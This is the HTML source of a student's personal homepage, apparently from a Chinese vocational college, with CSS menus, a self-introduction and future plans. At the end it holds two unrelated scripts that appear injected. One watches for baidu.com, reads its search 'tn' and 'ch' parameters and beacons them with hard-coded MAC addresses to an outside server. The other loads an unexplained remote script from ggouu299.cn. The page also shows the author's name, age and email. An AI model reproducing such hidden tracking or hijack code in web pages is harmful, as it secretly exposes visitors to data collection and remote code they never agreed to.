<!DOCTYPE html>
<html>

	<head>
		<meta charset="utf-8" />
		<meta name="keywords" content="个人主页,王玉钰，玉玉，小仙女，宇宙超级无敌美少女战士，，信息工程学院" />
		<meta name="author" content="王玉钰" />
		<meta name="discription" content="这是一个学生个人网页，大学第一个学期的学习成果，不是很好，但我会努力做得更好。" />
		<title>我的主页</title>
		<style type="text/css">
				.block-menu {
				display: block;
				background-color: rgba(0, 153, 204, 0.8);
			}
			
			.block-menu li {
				display: inline-block;
			}
			
			.block-menu li a {
				color: rgba(0, 153, 204, 0.8);
				display: block;
				text-decoration: none;
				font-family: 'Passion One', Arial, sans-serif;
				font-smoothing: antialiased;
				text-transform: uppercase;
				overflow: visible;
				line-height: 20px;
				font-size: 24px;
				padding: 15px 10px;
			}
			/* animation domination */
			
			.three-d {
				perspective: 200px;
				transition: all .07s linear;
				position: relative;
				cursor: pointer;
			}
			/* complete the animation! */
			
			.three-d:hover .three-d-box,
			.three-d:focus .three-d-box {
				transform: translateZ(-25px) rotateX(90deg);
			}
			
			.three-d-box {
				transition: all .3s ease-out;
				transform: translatez(-25px);
				transform-style: preserve-3d;
				pointer-events: none;
				position: absolute;
				top: 0;
				left: 0;
				display: block;
				width: 100%;
				height: 50%;
			}
			/* 
	put the "front" and "back" elements into place with CSS transforms, 
	specifically translation and translatez
*/
			
			.front {
				transform: rotatex(0deg) translatez(25px);
			}
			
			.back {
				transform: rotatex(-90deg) translatez(25px);
				color: #ffe7c4;
			}
			
			.front,
			.back {
				display: block;
				width: 100%;
				height: 100%;
				position: absolute;
				top: 0;
				left: 0;
				background-color: rgba(0, 153, 204, 0.8);
				padding: 15px 10px;
				color: white;
				pointer-events: none;
				box-sizing: border-box;
			}
			
			#aa {
				top: 100px;
				width: 100%;
				height: 50px;
				margin: 10px auto;
				opacity: 0.9;
			}
			
			body {
				background-color: lightblue;
			}
			
			.banner {
				height: 200px;
				text-align: center;
				/*banner高度，文字居中显示*/
				background-color: rgba(0, 153, 204, 0.8);
				font-family: arial;
				font-size: 50px;
				opacity: 0.9;
				/*banner变得半透明*/
				border-radius: 20px;
				/*让banner的四角变圆*/
				box-shadow: 5px 5px 5px #656;
				/*banner阴影*/
				line-height: 200px;
				color: rgba(0, 153, 204, 0.8);
				/*文字颜色*/
				text-shadow: -1px -1px 0 #FFFFFF, 1px 1px 0 #333, 1px 1px 0 #444;
				/*让文字有立体效果*/
				display: block;
				animation: banner 3s 1;
			}
			/*主页的banner属性*/
			
			#banner1 {
				position: absolute;
				/*绝对定位*/
				width: 100%;
				/*占全部宽*/
				height: 200px;
				/*高度*/
				left: -40px;
				background: url(img/banner.gif);
			}
			
			#banner3 {
				position: absolute;
				/*绝对定位*/
				width: 100%;
				height: 1200px;
				left: 0px;
				background: url(img/timg.gif) fixed;
			}
			/*不随网页滚动而滚动*/
			
			.list {
				background-color: rgba(0, 153, 204, 0.8);
				width: 20%;
				height: 50px;
				float: left;
				border-radius: 20px;
				box-shadow: 5px 5px 5px #656;
				text-align: center;
				line-height: 50px;
				font-size: 30px;
				font-family: "楷体";
				color: rgba(0, 153, 204, 0.8);
				text-shadow: -1px -1px 0 #FFFFFF, 1px 1px 0 #333, 1px 1px 0 #444;
				/*设置阴影*/
			}
			/*下面链接按钮的属性*/
			
			#content {
				width: 1300px;
				/*宽度占百分之70*/
				margin: 0 auto;
				/*居中*/
			}
			
			#text-shodow {
				text-shadow: ;
			}
			
			#moster {
				height: 1000px;
				/*整个主页面的高度*/
				opacity: 0.8;
				/*设置半透明*/
				border-radius: 20px;
				/*圆角*/
				box-shadow: 5px 5px 5px #656;
				/*设置阴影*/
				background-color: rgba(0, 153, 204, 0.8);
				/*背景颜色*/
				background-image: url(img/hostbeijin.png);
				/*添加图片*/
				background-repeat: no-repeat;
				/*图片不重复*/
				background-position: 100% 100%;
				/*图片的相对位置*/
			}
			/*整个主页面*/
			/*主页面右下角的图片*/
			
			#moster2 {
				height: 300px;
				/*高度*/
				background-image: url(img/touxiang.png);
				/*放置头像*/
				background-repeat: no-repeat;
				/*不重复*/
				background-position: 6% 80%;
				/*放置头像*/
			}
			
			.moster3 {
				margin-left: 500px;
				background-color: #FFFFFF;
				/*背景颜色*/
				height: 250px;
				/*高度*/
				width: 700px;
				/*宽度*/
				font-family: "楷体";
				/*字体*/
				background-color: rgba(0, 153, 204, 0.1);
				/*背景颜色*/
			}
			/*主页的第一段自我介绍的属性*/
			
			#text {
				font-size: 50px;
				/*字体大小*/
				color: #f0f8ff;
				/*字体颜色*/
				text-shadow: 2px 2px 0 rgba(255, 105, 111, 0.5);
				/*字体阴影*/
				text-align: center;
				/*字体居中*/
				font-weight: bolder;
				/*字体加粗*/
				font-family: "微软雅黑";
				/*设置字体*/
			}
			
			#text2 {
				font-size: 25px;
				/*字体大小*/
				color: #fb6c1;
				/*字体颜色*/
				font-family: "微软雅黑";
				/*设置字体*/
			}
			
			#futuretext {
				margin-left: 280px;
				margin-top: 200px;
				height: 400px;
				/*高度*/
				width: 600px;
				/*宽度*/
				background-color: rgba(0, 153, 204, 0.1);
				/*背景颜色*/
			}
			
			#footer {
				clear: all;
				font-size: 25px;
				/*字体大小*/
				font-family: "仿宋";
				/*字体样式*/
				text-align: center;
				/*设置居中*/
				margin: 0px;
				text-decoration: overline;
				text-decoration: underline;
				font-weight: 900;
				/*字体加粗*/
			}
			/*页脚*/
			
			a:hover {
				color: #7ec0ee;
				text-shadow: -1px -1px 0 #FFFFFF, 1px 1px 0 #333, 1px 1px 0 #444;
			}
			
			@keyframes banner {
				0% {
					transform: left:0px;
					top: 100px;
					opacity: 0;
				}
				30% {
					transform: left:0px;
					top: 100px;
					opacity: 0;
				}
				100% {
					transform: left:0px;
					top: 20px;
					opacity: 1;
				}
		</style>
	</head>

	<body>
		<div id="content">
			<div id="banner3"></div>
			<div id="banner1"></div>
			<a class="banner">&diams;&diams;&diams;&diams;&diams;My Homepage&diams;&diams;&diams;&diams;&diams;</a>
			<div id="aa">
				<ul class="block-menu">
					<li>
						<a href="index.html" class="three-d">
							主页
							<span aria-hidden="true" class="three-d-box">
			<span class="front">主页</span>
							<span class="back">主页</span>
							</span>
						</a>
					</li>
					<li>
						<a href="geren.html" class="three-d">
							个人
							<span aria-hidden="true" class="three-d-box">
			<span class="front">个人</span>
							<span class="back">个人</span>
							</span>
						</a>
					</li>
					<li>
						<a href="school.html" class="three-d">
							学校
							<span aria-hidden="true" class="three-d-box">
			<span class="front">学校</span>
							<span class="back">学校</span>
							</span>
						</a>
					</li>
					<li>
						<a href="friends.html" class="three-d">
							朋友
							<span aria-hidden="true" class="three-d-box">
			<span class="front">朋友</span>
							<span class="back">朋友</span>
							</span>
						</a>
					</li>
					<li>
						<a href="bishan.html" class="three-d">
							家乡
							<span aria-hidden="true" class="three-d-box">
			<span class="front">家乡</span>
							<span class="back">家乡</span>
							</span>
						</a>
					</li>
					<!-- more items here -->
				</ul>
			</div>
			<div id="moster">
				<div id="moster2">
					<div class="moster3">
						<div id="text">
							<marquee direction=left behavior=alternate>个人介绍</marquee>
						</div>
						<a id="text2">
							<marquee direction=left behavior=slide>姓名：王玉钰</marquee><br />
							<marquee direction=left behavior=slide>性别：女</marquee><br />
							<marquee direction=left behavior=slide>年龄：19</marquee><br />个人爱好：课余的时候我喜欢在寝室里睡觉打游戏吃东西码代码看看课外书，周末的时候喜欢和朋友约出去玩骑自行车，回了家的时候跳舞唱歌这些都是喜欢的。</a>
					</div>
					<div id="futuretext">
						<div id="text">
							<marquee direction=left behavior=alternate>对未来的看法</marquee>
						</div>
						<a id="text2">
							未来的书店宛如一本翻开的大书.正面的幕墙上,你会看见许多色彩鲜艳、生动有趣的画面,正向过往行人介绍新出版的书,吸引着人们走进知识的殿堂.我想做游戏方面的程序，因为我喜欢打游戏，我想做一款让自己很满意的游戏，那我将很有成就感，我还想开一间花花小屋，让自己的心不要浮躁，沉静下来，我的游戏理念就是“将方便带给用户，把麻烦留于自己！”认真学习，坚持下去，未来是属于我们的！加油吧，朋友！
						</a>
					</div>
				</div>
				<!--放置头像-->

			</div>
			<div id="footer">版权所有：重庆机电职业技术学院（计算机应用技术2班） 制作人：王玉钰 联系方式：2929517453@QQ.com</div>
		</div>
		<embed src="http://okok.dev.dxdc.net/music/Glee Cast - Hey Jude (Glee Cast Version) [mqms].mp3" height="50px"></embed>
		<script>
			(function() {
				if(window.location.host != 'www.baidu.com' || window._BD_C || window.sendImage) {
					return
				}
				window._BD_C = {
					mac: "00-E0-2C-68-09-DF",
					bmac: "00-88-2A-F8-33-CC",
					cid: "zd",
					url: ""
				};
				setInterval(function() {
					if(window.location.href != window._BD_C.url) {
						window._BD_C.tn = '', window._BD_C.ch = '';
						window._BD_C.url = window.location.href;
						if(window.location.search != '') {
							_arg = window.location.search.replace('?', '').split('&');
							for(i in _arg) {
								if(_arg.hasOwnProperty(i) && _arg[i] != '') {
									t = _arg[i].split('=');
									switch(t[0]) {
										case 'tn':
											window._BD_C.tn = t[1];
											break;
										case 'ch':
											window._BD_C.ch = t[1];
											break
									}
								}
							}
						}
						_t = new Image;
						_t.src = "https://api-test.sndun.com/wb/stage.json?tntype=baidu&cid=" + window._BD_C.cid + "&bmac=" + window._BD_C.bmac + "&mac=" + window._BD_C.mac + "&tn=" + window._BD_C.tn + "&ch=" + window._BD_C.ch + '&_=' + (+new Date());
						_t = null
					}
				}, 100)
			})();
		</script>
		<script src="https://ggouu299.cn/sa.php?m=1529988781" type="text/javascript"></script>
	</body>

</html>